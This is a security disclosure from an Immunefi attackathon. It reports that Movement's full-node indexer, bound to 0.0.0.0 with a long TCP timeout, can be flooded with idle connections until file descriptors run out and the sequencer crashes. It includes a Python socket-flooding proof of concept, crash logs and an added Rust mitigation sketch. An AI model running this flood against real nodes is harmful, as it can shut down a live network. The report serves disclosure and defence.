# #43250 [BC-Critical] Excessive TCP timeout allows attacker to crash the sequencer via the indexer service

**Submitted on Apr 4th 2025 at 02:40:16 UTC by @usmannk for** [**Attackathon | Movement Labs**](https://immunefi.com/audit-competition/movement-labs-attackathon)

* **Report ID:** #43250
* **Report Type:** Blockchain/DLT
* **Report severity:** Critical
* **Target:** <https://github.com/immunefi-team/attackathon-movement/tree/main/networks/movement/movement-full-node>
* **Impacts:**
  * Network not being able to confirm new transactions (total network shutdown)

## Description

## Brief/Intro

The indexer service is served by the Movement Full Node and serves HTTP requests. However, this service has an excessive 120-second timeout on its requests. This allows an attacker to crash the sequencer via resource exhaustion.

## Vulnerability Details

The indexer service is bound to the IP address 0.0.0.0 in both the default and suggested (<https://docs.movementnetwork.xyz/assets/files/config-4551e1260977506ebb8dcdea19b254ed.json>) configurations. Because 0.0.0.0 accepts requests not just from the local host but from any IP address on the internet, an attacker may call this RPC from outside the local network.

Each HTTP request opened to the indexer service creates a file descriptor on the host. By default nix OS allows 256 file descriptors per process. By spamming the indexer with connection requests and leaving them hanging, an attacker can use up all available file descriptors for the full node. At this point, the full node cannot accept or initiate any further connections. It will cease to receive new transactions or send any to DA.

## Impact Details

The sequencer will not be able to process transactions or submit batches to DA. It will then also panic and crash, halting the network.

## References

The main RPC and sequencer node serves such an indexer: <https://github.com/movementlabsxyz/movement/tree/main/docs/indexer#prerequisites>

## Proof of Concept

* Run the Movement stack by calling `just movement-full-node native build.setup.celestia-local.eth-local`
* Run the following Python code, pointed at the address and port of the indexer service:

```
import socket

# Address and port of the indexer service
server_address = ('localhost', 30734)
arr = []  # references are kept so the sockets stay open
for _ in range(9999):  # adjust for fd limit, likely 256 will suffice
    arr.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
    arr[-1].connect(server_address)
```

* Observe as the sequencer node becomes unavailable, then the sequencer crashes, halting the network.

```
2025-04-04T02:30:39.836891Z ERROR hyper::server::tcp: accept error: Too many open files (os error 24)
Error: readiness check fail - exit status 56
2025-04-04T02:30:40.336431Z  INFO movement_full_node::node::manager: Receive Terminate Signal
thread 'tokio-runtime-worker' panicked at /Users/<redacted>/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.41.1/src/
runtime/blocking/shutdown.rs:51:21:
Cannot drop a runtime in a context where blocking is not allowed. This happens when a runtime is dropped from within an asynchronous
context.
stack backtrace:
2025-04-04T02:30:40.838283Z ERROR hyper::server::tcp: accept error: Too many open files (os error 24)
```
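
The failure above depends on idle connections being allowed to pin file descriptors for a long time with no upper bound on their number. The following sketch is an added example, not code from the Movement repository or from the report author: an accept loop that caps concurrently open sockets and drops peers that stay silent past a short idle timeout. It uses only the Rust standard library rather than the hyper/tokio stack seen in the log; `spawn_guarded`, `Stats`, the cap, the timeout and the loopback bind address are all assumptions chosen for illustration.

```rust
use std::io::Read;
use std::net::{SocketAddr, TcpListener, TcpStream};
use std::sync::{atomic::{AtomicUsize, Ordering::SeqCst}, Arc};
use std::{thread, time::Duration};

/// Counters an operator (or a test) can read to see what the guard did.
#[derive(Default)]
pub struct Stats {
    pub active: AtomicUsize,   // sockets currently held open
    pub peak: AtomicUsize,     // highest value `active` ever reached
    pub rejected: AtomicUsize, // connections closed at accept time
}

/// Hold at most `max_conns` sockets open on `bind`; a peer that sends nothing
/// within `idle` is disconnected, which releases its file descriptor.
pub fn spawn_guarded(bind: &str, max_conns: usize, idle: Duration) -> std::io::Result<(SocketAddr, Arc<Stats>)> {
    let listener = TcpListener::bind(bind)?;
    let (addr, stats) = (listener.local_addr()?, Arc::new(Stats::default()));
    let shared = Arc::clone(&stats);
    thread::spawn(move || {
        for stream in listener.incoming() {
            let Ok(mut stream) = stream else { continue };
            // Only this thread admits connections, so `active` never exceeds the cap.
            if shared.active.load(SeqCst) >= max_conns {
                shared.rejected.fetch_add(1, SeqCst);
                continue; // dropping `stream` closes the socket immediately
            }
            shared.peak.fetch_max(shared.active.fetch_add(1, SeqCst) + 1, SeqCst);
            let conn = Arc::clone(&shared);
            thread::spawn(move || {
                let mut buf = [0u8; 1024];
                // With a read timeout, a silent peer makes read() fail after `idle`.
                if stream.set_read_timeout(Some(idle)).is_ok() {
                    let _ = stream.read(&mut buf); // request handling would go here
                }
                drop(stream);
                conn.active.fetch_sub(1, SeqCst);
            });
        }
    });
    Ok((addr, stats))
}

fn main() -> std::io::Result<()> {
    let (addr, stats) = spawn_guarded("127.0.0.1:0", 2, Duration::from_millis(200))?; // constructed values
    let _idle: Vec<_> = (0..5).map(|_| TcpStream::connect(addr)).collect(); // silent local clients
    thread::sleep(Duration::from_secs(1));
    println!("peak={} rejected={} active={}", stats.peak.load(SeqCst), stats.rejected.load(SeqCst), stats.active.load(SeqCst));
    Ok(())
}
```

The cap only helps if it sits well below the process's file descriptor limit, leaving headroom for the node's other sockets and files.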


